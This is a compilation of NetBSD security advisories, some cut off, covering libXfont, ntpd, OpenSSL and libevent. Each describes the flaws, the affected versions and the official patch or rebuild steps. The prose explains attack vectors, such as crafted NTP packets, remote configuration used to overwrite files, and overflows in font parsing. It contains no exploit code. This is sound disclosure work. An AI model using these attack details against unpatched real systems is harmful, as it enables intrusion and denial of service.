required for install): The following instructions describe how to upgrade your calendar(1) binaries by updating your source tree and rebuilding and installing a new version of calendar(1). * NetBSD-current: Systems running NetBSD-current dated from before 2015-07-01 should be upgraded to NetBSD-current dated 2015-07-02 or later. The following files/directories need to be updated from the netbsd-current CVS branch (aka HEAD): usr.bin/calendar/calendar.c To update from CVS, re-build, and re-install calendar(1): # cd src # cvs update -d -P usr.bin/calendar/calendar.c # cd usr.bin/calendar # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 5.* and 6.*: Systems running NetBSD 5.* and 6.* sources dated from before 2015-07-01 should be upgraded from NetBSD 6.* sources dated 2015-07-02 or later. The following files/directories need to be updated from the netbsd-5, netbsd-5-1, netbsd-5-2, netbsd-6, netbsd-6-0, or netbsd-6-1 branches: usr.bin/calendar/calendar.c To update from CVS, re-build, and re-install calendar(1): # cd src # cvs update -r -d -P usr.bin/calendar/calendar.c # cd usr.bin/calendar # make USETOOLS=no cleandir dependall # make USETOOLS=no install Thanks To = David Holland for reporting and providing fix for this issue. Revision History 2016-04-16 Initial release More Information
NetBSD Security Advisory 2016-002: BDF file parsing issues in libXfont
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2016-002 = Topic: BDF file parsing issues in libXfont Version:NetBSD-current: affected prior to 20150319 NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected pkgsrc: affected Severity: remote DoS, potential local privilege escalation Fixed: NetBSD-current: March 18th, 2015 NetBSD-6 branch:March 18th, 2015 NetBSD-6-1 branch: March 18th, 2015 NetBSD-6-0 branch: March 18th, 2015 NetBSD-5 branch:March 18th, 2015 NetBSD-5-2 branch: March 18th, 2015 NetBSD-5-1 branch: March 18th, 2015 pkgsrc: libXfont-1.5.1 corrects this issue Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Ilja van Sprundel, a security researcher with IOActive, has discovered an issue in the parsing of BDF font files by libXfont. Additional testing by Alan Coopersmith and William Robinet with the American Fuzzy Lop (afl) tool uncovered two more issues in the parsing of BDF font files. As libXfont is used by the X server to read font files, and an unprivileged user with access to the X server can tell the X server to read a given font file from a path of their choosing, these vulnerabilities have the potential to allow unprivileged users to run code with the privileges of the X server (often root access). These vulnerabilities have been assigned CVE-2015-1802, CVE-2015-1803, and CVE-2015-1804. Technical Details = CVE-2015-1802: bdfReadProperties: property count needs range check The bdf parser reads a count for the number of properties defined in a font from the font file, and allocates arrays with entries for each property based on that count. It never checked to see if that count was negative, or large enough to overflow when multiplied by the size of the structures being allocated, and could thus allocate the wrong buffer size, leading to out of bounds writes. CVE-2015-1803: bdfReadCharacters: bailout if a char's bitmap cannot be read If the bdf parser failed to parse the data for the bitmap for any character, it would proceed with an invalid pointer to the bitmap data and later crash when trying to read the bitmap from that pointer. CVE-2015-1804: bdfReadCharacters: ensure metrics fit into xCharInfo struct The bdf parser read metrics values as 32-bit integers, but stored them into 16-bit integers. Overflows could occur in various operations leading to out-of-bounds memory access. X.Org believes all prior versions of this library contain these flaws, dating back to its introduction in X11R5. Solutions and Workarounds = Workaround: don't allow clients that might open unvetted fonts on your X server. Note this includes web browsers. Solution: replace a vulnerable libXfont with a fixed version. Binary fixes: download http://nyftp.NetBSD.org/pub/NetBSD-daily/REL/DATE/ARCH/binary/sets/xbase.tgz with REL being your NetBSD release version DATE being a date past the fix date for your release ARCH being the architecture of the system to be fixed libXfont paths will differ by version and architecture, depending on whether your architecture uses /usr/X11R6 or /usr/X11R7: X11R6: ./usr/X11R6/lib/libXfont.so ./usr/X11R6/lib/libXfont.so.1 ./usr/X11R6/lib/libXfont.so.1.5 X11R7: all versions./usr/X11R7/lib/libXfont.so netbsd-5* ./usr/X11R7/lib/libXfont.so.2 ./usr/X11R7/lib/libXfont.so.2.0 netbsd-6-0+ ./usr/X11R7/lib/libXfont.so.3 ./usr/X11R7/lib/libXfont.so.3.0 so e.g. for a NetBSD 6.0 or younger amd64 system you'd do: cd / && tar xzpf path-to/xbase.tgz ./usr/X11R7/lib/libXfont.so \ ./usr/X11R7/lib/libXfont.so.3 \ ./usr/X11R7/lib/libXfont.so.3.0 - From source: affected files and fixed versions are: X11R7: xsrc/external/mit/libXfont/dist/src/bitmap/bdfread.c netbsd-5-1 1.1.1.1.2.1.2.2 netbsd-5-2 1.1.1.1.2.1.4.2 netbsd-51.1.1.1.2.3 netbsd-6-1 1.1.1.2.6.2 netbsd-6-0 1.1.1.2.4.2 netbsd-61.1.1.2.2.2 netbsd-71.3.4.1 HEAD1.4 X11R6: xsrc/xfree/xc/lib/font/bitmap/bdfread.c netbsd-5-1 1.2.6.2 netbsd-5-2 1.2.12.2 netbsd-51.2.2.2 netbsd-6-0 1.2.10.2 netbsd-6-1 1.2.14.2 netbsd-61.2.8.2 netbsd-71.4.4.1 HEAD1.5 use build.sh -x distribution to build a new system including X after updating your source. Thanks To = Thanks to Ilja van Sprundel, Alan Coopersmith and
NetBSD Security Advisory 2016-001: Multiple vulnerabilities in ntp daemon
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2016-001 = Topic: Multiple vulnerabilities in ntp daemon Version:NetBSD-current: source prior to Fri, Oct 23 2015 NetBSD 7.0: affected NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected Severity: Local DoS / Kernel execution redirection Fixed: NetBSD-current: Fri, Oct 23 2015 NetBSD-7-0 branch: Sat, Nov 7 2015 NetBSD-6-1 branch: Sat, Nov 7 2015 NetBSD-6-0 branch: Sat, Nov 7 2015 NetBSD-6 branch:Sat, Nov 7 2015 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Several bugs were fixed in the ntp-4.8.4p4 release that affect the daemon operation and can be remotely exploited: - crash the daemon - perform code injection - change time - overwrite files - consume excessive CPU and/or disk space Technical Details = 1. Remote Configuration Attacks If ntpd(8) is configured to allow remote configuration, and if the (possibly spoofed) source IP address is allowed to send remote configuration requests, and if the attacker knows the remote configuration password or if ntpd(8) was configured to disable authentication, then an attacker can can send a set of packets to ntpd(8) that may cause it to: - Memory corruption, with the hypothetical possibility of a code injection. [CVE-2015-7854], [CVE-2015-7849] - Overwrite files. [CVE-2015-7851] - Crash and/or create a potentially huge log file. Specifically, the attacker could enable extended logging, point the key file at the log file, and cause what amounts to an infinite loop. [CVE-2015-7850] - Overwrite other files. In particular possible for an attacker to use the "pidfile" or "driftfile" directives to potentially overwrite other files. [CVE-2015-5196] The default configuration of ntpd(8) within NetBSD does not allow remote configuration. 2. Autokey issues If ntpd(8) is configured to use autokey, then an attacker can send packets to ntpd that will, after several days of ongoing attack, cause it to run out of memory. [CVE-2015-7701] The fix for CVE-2014-9750 was incomplete in that there were certain code paths where a packet with particular autokey operations that contained malicious data was not always being completely validated. Receipt of these packets can cause ntpd to crash. [CVE-2015-7691, CVE-2015-7692, CVE-2015-7702]. The default configuration of ntpd(8) within NetBSD does not use autokey. 3. Crypto-NAK packets Crypto-NAK packets can be used to cause ntpd(8) to accept time from an unauthenticated ephemeral symmetric peer by bypassing the authentication required to mobilize peer associations. [CVE-2015-7871] 4. Crafted mode 6 and 7 packets If ntpd(8) is fed a crafted mode 6 or mode 7 packet containing an unusually long data value where a network address is expected, the decodenetnum() function will abort with an assertion failure instead of simply returning a failure condition. [CVE-2015-7855] If ntpd(8) is configured to enable mode 7 packets, and if the use of mode 7 packets is not properly protected through the use of the available mode 7 authentication and restriction mechanisms, and if the (possibly spoofed) source IP address is allowed to send mode 7 queries, then an attacker can send a crafted packet to ntpd that will cause it to crash. [CVE-2015-7848] The default configuration of ntpd(8) within NetBSD does not allow mode 7 packets. 5. Custom refclock driver incomplete data validation A negative value for the datalen parameter will overflow a data buffer. The NTF ntpd(8) driver implementation always sets this value to 0 and are therefore not vulnerable to this weakness. If the system runs a custom refclock driver in ntpd(8) and that driver supplies a negative value for datalen (no custom driver of even minimal competence would do this), then ntpd(8) would overflow the data buffer. It is even hypothetically possible in this case that instead of simply crashing ntpd(8), the attacker could effect a code injection attack. [CVE-2015-7853] 6. ntpq(8) potential memory corruption If an attacker can figure out the precise moment that ntpq(8) is listening for data and the port number on which it is listening, or if the attacker can provide a malicious instance ntpd(8) that
NetBSD Security Advisory 2015-007: OpenSSL and SSLv3 vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2015-007 = Topic: OpenSSL and SSLv3 vulnerabilities Version:NetBSD-current: source prior to Mar 19th NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected pkgsrc: affected Severity: remote DoS, confidentiality compromise Fixed: NetBSD-current: Mar 20th, 2015 NetBSD-7 branch:Mar 20th, 2015 NetBSD-6-0 branch: Mar 20th, 2015 NetBSD-6-1 branch: Mar 20th, 2015 NetBSD-6 branch:Mar 20th, 2015 NetBSD-5-2 branch: Mar 20th, 2015 NetBSD-5-1 branch: Mar 20th, 2015 NetBSD-5 branch:Mar 20th, 2015 pkgsrc: openssl-1.0.2a corrects this issue Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract This advisory covers the OpenSSL Security Advisory of Mar 19th, 2015 which lists eight different vulnerabilities that affect NetBSD releases: RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204) (reclassified) Segmentation fault in ASN1_TYPE_cmp (CVE-2015-0286) ASN.1 structure reuse memory corruption (CVE-2015-0287) PKCS7 NULL pointer dereferences (CVE-2015-0289) Base64 decode (CVE-2015-0292) (fixed in January without advisory) DoS via reachable assert in SSLv2 servers (CVE-2015-0293) Use After Free following d2i_ECPrivatekey error (CVE-2015-0209) X509_to_X509_REQ NULL pointer deref (CVE-2015-0288) Technical Details = See: https://www.openssl.org/news/secadv/20150319.txt Solutions and Workarounds = Workarounds (partial) : the MiTM weakening of chosen encryption will not work if the server does not allow weak encryption; this is usually configurable on the server side. This will incidentally also protect against CVE-2015-0293. Solution: Update the OpenSSL libraries and restart all affected services. If you are on NetBSD 6.x or newer: Please note that the versions below represent fixes of the vulnerabilities against OpenSSL 1.0.1k; in the meantime the rest of OpenSSL 1.0.1m has been applied, and we would suggest updating to that. If you are using NetBSD 5.x: Please be aware that while the crypto library from the OpenSSL in NetBSD 5.x is still ok, that is not true for the ssl library. The ssl library supports as newest and safest protocol TLS 1.0, and that is no longer considered good enough. At the same time we cannot just update OpenSSL on that branch to a newer version since all available newer ones are incompatible. Thus we would advise you to use OpenSSL from pkgsrc for all uses where you actually want secure SSL connections. Programs in base that use libssl are: amd, pkgtools, postfix, hostapd, wpa_supplicant, httpd and the ldap client. In cases where you use the encrypted communications feature of these programs across an untrusted medium, using replacements from pkgsrc is recommended as well. - From source: +--- Update src and rebuild and install. Changed files: relative to src/crypto/external/bsd/openssl/dist: FileHEADnetbsd-7 + + + + + + + + + + + + + + + + + + + + + + + + + + + crypto/asn1/a_type.c1.2 1.1.1.1.26.2 crypto/asn1/tasn_dec.c 1.2 1.1.1.2.22.2 crypto/pkcs7/pk7_doit.c 1.2 1.1.1.5.2.1 crypto/pkcs7/pk7_lib.c 1.2 1.1.1.2.22.1 doc/crypto/d2i_X509.pod 1.2 1.1.1.2.26.1 ssl/s2_lib.c1.3 1.1.1.2.2.2 ssl/s2_srvr.c 1.2 1.1.1.4.10.2 Filenetbsd-6netbsd-6-1 netbsd-6-0 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + crypto/asn1/a_type.c1.1.1.1.8.2 1.1.1.1.22.21.1.1.1.14.2 crypto/asn1/tasn_dec.c 1.1.1.2.4.2 1.1.1.2.18.21.1.1.2.10.2 crypto/pkcs7/pk7_doit.c 1.1.1.3.4.3 1.1.1.3.4.1.6.2 1.1.1.3.4.1.4.2 crypto/pkcs7/pk7_lib.c 1.1.1.2.4.1 1.1.1.2.18.11.1.1.2.10.1 doc/crypto/d2i_X509.pod 1.1.1.2.8.1 1.1.1.2.22.11.1.1.2.14.1 ssl/s2_lib.c1.1.1.1.8.3 1.1.1.1.22.31.1.1.1.14.3 ssl/s2_srvr.c 1.1.1.3.4.3 1.1.1.3.12.31.1.1.3.10.3 relative to src/crypto/dist/openssl: Filenetbsd-5netbsd-5-2 netbsd-5-1 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + crypto/asn1/a_type.c1.1.1.7.4.2 1.1.1.7.2.2 1.1.1.7.12.2 crypto/asn1/tasn_dec.c
NetBSD Security Advisory 2015-008: OpenSSL and TLS protocol vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 NetBSD Security Advisory 2015-008 = Topic: OpenSSL and TLS protocol vulnerabilities Version:NetBSD-current: source prior to July 7th NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected pkgsrc: affected Severity: remote DoS, confidentiality compromise Fixed: NetBSD-current: Jul 7th, 2015 NetBSD-7 branch:Jul 11th, 2015 NetBSD-6-0 branch: Jul 12th, 2015 NetBSD-6-1 branch: Jul 12th, 2015 NetBSD-6 branch:Jul 12th, 2015 NetBSD-5-2 branch: Aug 14th, 2015 NetBSD-5-1 branch: Aug 14th, 2015 NetBSD-5 branch:Aug 14th, 2015 pkgsrc: openssl-1.0.2d corrects these issues Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract This advisory covers the OpenSSL Security Advisory of June 11th, 2015 which lists seven different vulnerabilities that affect NetBSD releases; also, the OpenSSL Security Advisory of July 9th, 2015 with one vulnerability that affected only NetBSD-current: DHE man-in-the-middle protection (Logjam, CVE-2015-4000) Malformed ECParameters causes infinite loop (CVE-2015-1788) Exploitable out-of-bounds read in X509_cmp_time (CVE-2015-1789) PKCS7 crash with missing EnvelopedContent (CVE-2015-1790) CMS verify infinite loop with unknown hash function (CVE-2015-1792) Race condition handling NewSessionTicket (CVE-2015-1791) Invalid free in DTLS (CVE-2014-8176) and Alternative chains certificate forgery (CVE-2015-1793) Also, in NetBSD 5 a regression was introduced October 19th last year concerning the SSL server code. Technical Details = See https://www.openssl.org/news/secadv/20150611.txt and https://www.openssl.org/news/secadv/20150709.txt The regression in NetBSD 5.* was due to a faulty application of the POODLE mitigation code, and made the SSL server fail the client handshake request, with the exception of SSLv3 and TLS1 handshakes where RC4_MD5 was an acceptable cipher, which would then be the cipher getting used. In summary this caused a comparably weak cipher to be used if the connection succeeded as all. Fixing this problem provides only limited help, though: Please be aware that while the crypto library from the OpenSSL in NetBSD 5.x is still ok, that is not true for the ssl library. The ssl library supports as newest and safest protocol TLS 1.0, and that is no longer considered good enough. At the same time we cannot just update OpenSSL on that branch to a newer version since all available newer ones are incompatible. Solutions and Workarounds = Solution: Update the OpenSSL libraries and restart all affected services. Users of NetBSD 5.*: Please consider using OpenSSL from pkgsrc for all uses where you actually want secure SSL connections. Programs in that use libssl are: amd, pkgtools, postfix, hostapd, wpa_supplicant, httpd and the ldap client. In cases where you use the encrypted communications feature of these programs across an untrusted medium, using replacements from pkgsrc is recommended as well. - From source: +--- Update src and rebuild and install. For NetBSD-6*, NetBSD-7* and NetBSD-current: cvs update -dP -r branch crypto/external/bsd/openssl - From tarballs: +- To obtain fixed binaries, fetch the appropriate base.tgz and comp.tgz from a daily build later than the fix dates, from http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/ with a date later than the fix date for your branch as listed above, and your release version and architecture (e.g. http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-6-1/20150300Z/amd64/binary/sets/), and then extract the files: Shared libraries: tar xzpf base.tgz \*libssl\* \*libcrypto\* And static libraries and linker config files: tar xzpf comp.tgz \*libssl\* \*libcrypto\* Get the fixed library into use +- Since the vulnerability is in a shared library, getting the old library purged and the fixed one into use requires restarting all programs that load libssl. The easiest way to do this is to reboot the system. Another method, using /bin/sh: ps ax -o pid | (while read pid; do \ pmap $pid | egrep '(libssl|libcrypto)' echo found $pid ;\ done) will find non-chrooted programs that have the affected libraries open; you'll need to restart them. sshd, ntp and named may not show up in this list since they may run chrooted and re-exec'ed
NetBSD Security Advisory 2015-003: NTPd multiple vulnerabilities (CVE-2014-929[3-6])
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2015-003 = Topic: NTPd multiple vulnerabilities (CVE-2014-929[3-6]) Version:NetBSD-current: source prior to Dec 19, 2014 NetBSD 7 Beta: source prior to Dec 23, 2014 NetBSD 6.1: affected NetBSD 6.0: affected NetBSD 5.2: affected NetBSD 5.1: affected pkgsrc (net/ntp4): affected Severity: Denial of Service Fixed: NetBSD-current: Dec 19, 2014 NetBSD-7 branch:Dec 28, 2014 NetBSD-6 branch:Dec 29, 2014 NetBSD-6-1 branch: Dec 29, 2014 NetBSD-6-0 branch: Dec 29, 2014 NetBSD-5 branch:Jan 08, 2015 NetBSD-5-2 branch: Jan 08, 2015 NetBSD-5-1 branch: Jan 08, 2015 pkgsrc: Dec 28, 2014 Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Multiple issues have been discovered with the Network Time Daemon and related programs, and published by NTP.org and US-CERT on December 19th. Systems that use ntpd, should upgrade to the latest version to avoid remote DoS attacks, and on NetBSD 5 since there is no Stack Smashing Protection the possibility of a remote compromise. Technical Details = Four different advisories have been published addressing different issues: CVE-2014-9293: Weak Default Key: When no key is set in the configuration ntpd(8) will generate keys with very few bits of entropy. CVE-2014-9294: The random number generator in ntp-keygen(8) is using a seed with very few bits of entropy to generate symmetric keys. CVE-2014-9295: With autokey authentication (crypto pw configuration directive), a remote user can construct a network packet that will cause stack overflow. CVE-2014-9296: The ntpd receive() function in ntp_proto.c is missing a return on error. Solutions and Workarounds = Aside from replacing the daemon, we advise administrators of systems that use ntpd(8) to firewall ports tcp/123 and udp/123 so that packets from unknown hosts are rejected. Get a new ntpd binary: VERS being your NetBSD version DATE being a build date past the fix date for your version ARCH being your machine architecture ftp -o /var/tmp/base.tgz http://nyftp.netbsd.org/pub/NetBSD-daily/VERS/DATE/ARCH/binary/sets/base.tgz cd / tar xzpf /var/tmp/base.tgz ./usr/sbin/ntpd Since ntpd was updated to the current upstream version, the changes touch a lot of files; if you want to update from source, updating the entire src tree is recommended. Another option to deal with the vulnerability is to install the updated ntp4 package and use the package ntpd until the system can be updated. Thanks To = Thanks to Harlan Stenn for alerting us to the upcoming NTP release, Christos Zoulas for upgrading the package and constructing initial patches, Jeff Rizzo for updating -7, Soren Jacobsen for updating -6, and Havard Eidnes for updating -5. Revision History 2015-03-17 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2015-003.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2015, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2015-003.txt,v 1.1 2015/03/17 06:58:44 spz Exp $ -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJVCwd7AAoJEAZJc6xMSnBuVj0P/irxWaVdekOl90tiSwu/cMRf qod+ysopoLOJQdODYDbBHAEMj4Zobw4/gMpBbUE3y3HMD2Wm2IKr4iiuWPMe7YfL +SctzvoEYUU6ive+RXOblfwiwxpv/Yq5CRnB3nZYpFao+zyQqccTL92gU/lXIBR4 GH5/J2PdYpILkM53nKnUXkcyrBbYwS2+ggAuvqThwKX8mW9h5S7YAXJusXY4qhUi 0Ya415WuDLPSSCp7s6R7/TuQ8Ujo3v53Eh8195bSt0gbY+Bk+0KgTrtm6Ak7BYY0 ImqkymXR0lvwJh+GcltYlSdUFSK0xUEecmD93WvPs9PwwfhD1+HapXZaCQQ/MMN1 ZgchePLDsDSQUQqNitAP633pWZyuQa8HXwXhLTcU7ZOADs4416LhfLnKyNBsimEz L8SN3O+HtxwiTFwwS2eje30hCSm/j/vqEnhtzWjpuuAxnzY2teTAPcX5t81gYf2s is21MkIUVKkRKZyK4KYtDhDCHsG5f8nLpZXDfrBZY/ocz5GASoQ+takbDS7nWSfm GFpYyjRlKJ6xBKcSuNsZ9zF4G6lSyxx60XBSaOu9KewokOEpD/hA6s7QTzLj8Y4L Y7zfyzzh5+z1uCoY9dKOTMfwTy1pSdblogHGOn+K8IBPDgQ3fwfucz5QVG7oGvlD CgqPPCdzIeJak0OKLUD3 =df8q -END PGP SIGNATURE-
NetBSD Security Advisory 2015-006: OpenSSL and SSLv3 vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2015-006 = Topic: OpenSSL and SSLv3 vulnerabilities Version:NetBSD-current: source prior to Jan 14th NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected Severity: remote DoS, confidentiality compromise Fixed: NetBSD-current: Jan 14th, 2015 NetBSD-7 branch:Jan 18th, 2015 NetBSD-6-0 branch: Jan 17th, 2015 NetBSD-6-1 branch: Jan 17th, 2015 NetBSD-6 branch:Jan 17th, 2015 NetBSD-5-2 branch: Jan 27th, 2015 NetBSD-5-1 branch: Jan 27th, 2015 NetBSD-5 branch:Jan 27th, 2015 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract This advisory covers the OpenSSL Security Advisory of Jan 8th, 2015 which lists eight different vulnerabilities: DTLS segmentation fault in dtls1_get_record (CVE-2014-3571) DTLS memory leak in dtls1_buffer_record (CVE-2015-0206) no-ssl3 configuration sets method to NULL (CVE-2014-3569) ECDHE silently downgrades to ECDH [Client] (CVE-2014-3572) RSA silently downgrades to EXPORT_RSA [Client] (CVE-2015-0204) DH client certificates accepted without verification [Server] (CVE-2015-0205) Certificate fingerprints can be modified (CVE-2014-8275) Bignum squaring may produce incorrect results (CVE-2014-3570) Please note that the OpenSSL project has announced the release of a new version of OpenSSL, with advisories, on March 19th, 2015. Technical Details = see https://www.openssl.org/news/secadv_20150108.txt Solutions and Workarounds = Workarounds: the MiTM weakening of chosen encryption will not work if the server does not allow weak encryption; this is usually configurable on the server side. Solution: Update the OpenSSL libraries. - From source: +--- Update src and rebuild and install. Note: OpenSSL in NetBSD-6, NetBSD-7 and NetBSD-current has been updated to version 1.0.1k; NetBSD-5 received a more selective patch but that's still 59 files touched. Updating the entire src tree is recommended. - From tarballs: +- To obtain fixed binaries, fetch the appropriate base.tgz and comp.tgz from a daily build later than the fix dates, from http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/ with a date later than the fix date for your branch as listed above, and your release version and architecture (e.g. http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-6-1/201501300500Z/amd64/binary/sets/), and then extract the files: Shared libraries: tar xzpf base.tgz \*libssl\* \*libcrypto\* And static libraries and linker config files: tar xzpf comp.tgz \*libssl\* \*libcrypto\* Get the fixed library into use +- Since the vulnerability is in a shared library, getting the old library purged and the fixed one into use requires restarting all programs that load libssl. The easiest way to do this is to reboot the system. Another method: using /bin/sh, ps ax -o pid | (while read pid; do \ pmap $pid | egrep '(libssl|libcrypto)' echo found $pid ;\ done) will find non-chrooted programs that have the affected libraries open; restart them. sshd will not show up in this list since it runs chrooted and re-exec'ed but also needs to be restartet. ldd programname will show the shared libraries a program will want to use. Thanks To = Thanks to the OpenSSL team for the advisory and fixes, Markus Stenberg of Cisco Systems, Inc. for reporting CVE-2014-3571, Chris Mueller for reporting CVE-2015-0206, Frank Schmirler for reporting CVE-2014-3569, Karthikeyan Bhargavan of the PROSECCO team at INRIA for reporting CVE-2014-3572, CVE-2015-0204 and CVE-2015-0205, Antti Karjalainen and Tuomo Untinen from the Codenomicon CROSS program, and Konrad Kraszewski from Google, for reporting CVE-2014-8275, Pieter Wuille from Blockstream, for reporting CVE-2014-3570 and suggesting an initial fix, and Adam Langley of Google for further analysis of the issue. Revision History 2015-03-17 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2015-006.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/
NetBSD Security Advisory 2015-005: buffer overflow in libevent (CVE-2014-6272)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2015-005 = Topic: buffer overflow in libevent (CVE-2014-6272) Version:NetBSD-current: source prior to Jan 29th NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected NetBSD 5.1 - 5.1.4: affected NetBSD 5.2 - 5.2.2: affected Severity: DoS, potential code execution Fixed: NetBSD-current: Jan 30th, 2015 NetBSD-7 branch:Feb 9th, 2015 NetBSD-6-0 branch: Feb 5th, 2015 NetBSD-6-1 branch: Feb 5th, 2015 NetBSD-6 branch:Feb 5th, 2015 NetBSD-5-2 branch: Feb 5th, 2015 NetBSD-5-1 branch: Feb 5th, 2015 NetBSD-5 branch:Feb 5th, 2015 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A defect in the libevent evbuffer API leaves programs that pass inputs that in sum overflow size_t to evbuffers vulnerable to a possible heap overflow or infinite loop. For this to be a security issue, the vulnerable program also must not be sanitizing buffer sizes supplied by the user. Technical Details = A program that uses evbuffer_add or evbuffer_expand followed by a bufferevent_write in NetBSD-6 or below, and additionally evbuffer_prepend, evbuffer_reserve_space or evbuffer_read in NetBSD-7 and -current, and does not sanity check user-derived buffer sizes it passes to the library functions, may allow an attacker to construct an evbuffer with inconsistent size and to overwrite parts of the program's memory outside the evbuffer. Solutions and Workarounds = Update libevent. - From source: +--- Update src and rebuild and install. - From tarballs: +- To obtain fixed binaries, fetch the appropriate base.tgz and comp.tgz from a daily build later than the fix dates, from http://nyftp.netbsd.org/pub/NetBSD-daily/rel/date/arch/binary/sets/ with a date later than the fix date for your branch as listed above, and your release version and architecture (e.g. http://nyftp.netbsd.org/pub/NetBSD-daily/netbsd-6-0/201502080050Z/amd64/binary/sets/), and then extract the files: Shared libraries: tar xzpf base.tgz \*libevent\* And static libraries and linker config files: tar xzpf comp.tgz \*libevent\* Get the fixed library into use +- Since the vulnerability is in a shared library, getting the old library purged and the fixed one into use requires restarting all programs that load libevent. The easiest way to do this is to reboot the system. Another method using /bin/sh: ps ax -o pid | (while read pid; do \ pmap $pid | egrep 'libevent' echo found $pid ;\ done) will find non-chrooted programs that have the affected libraries open; restart them. ldd programname will show the shared libraries a program will want to use. Fixed vulnerable source versions +--- src/external/bsd/libevent/dist/buffer.c HEAD1.3 netbsd-71.2.8.1 netbsd-61.1.1.1.8.1 netbsd-6-1 1.1.1.1.20.1 netbsd-6-0 1.1.1.1.14.1 src/lib/libevent/buffer.c netbsd-51.4.4.2 netbsd-5-2 1.4.4.1.6.1 netbsd-5-1 1.4.4.1.2.1 Thanks To = Thanks to Andrew Bartlett of Catalyst (catalyst.net.nz) for reporting this issue and Nick Mathewson of libevent for their advisory and fix. Revision History 2015-03-17 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2015-005.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2015, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2015-005.txt,v 1.1 2015/03/17 06:58:44 spz Exp $ -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJVCweMAAoJEAZJc6xMSnBuO9cP/2A29i3qF33fqxecE0j7qJT0 gtqy6mti0pEzmgAsNWBo9SRmLZY7JwOIESlaHBKLKbrgcmH7lUVpF4IlNSSITTFY mrkGZUtJbmS7jyDB9FNEnnYuAVdarFM8OJH3EgfByz+TsgxsBbkTG8BtOmIg21SW zcrmFn1/jaRJeTx4vqxpm084d6H65ZUnjjZNaSG4ReLur1mJRkAkq9yiiLsfpTUN 3pRiTtG3SMGuN6OkEjnRpZ8uGW+7xR6fnzOrJZRqWQtj/kh/NfOZz1emgXRpbPNS mz3QqoDT7eDuwvZY+OxJOHwSDd1i5OclHbMR3qCABXpoTVpT3Kwf/IziQA8VWSGP RiiJO56qoTD+z9wruBPFLuQzgBrU+UPOcXywtyl8y5sJstWrwJiGQiU/2XFacksp iUV5ZddctN0gyZl4ryYtRsrKH81HiBrmMvOBj/Kju+ZGRKMWgMO0Ub9sAOM5J694
NetBSD Security Advisory 2015-001: Protocol handling issues in X Window System servers
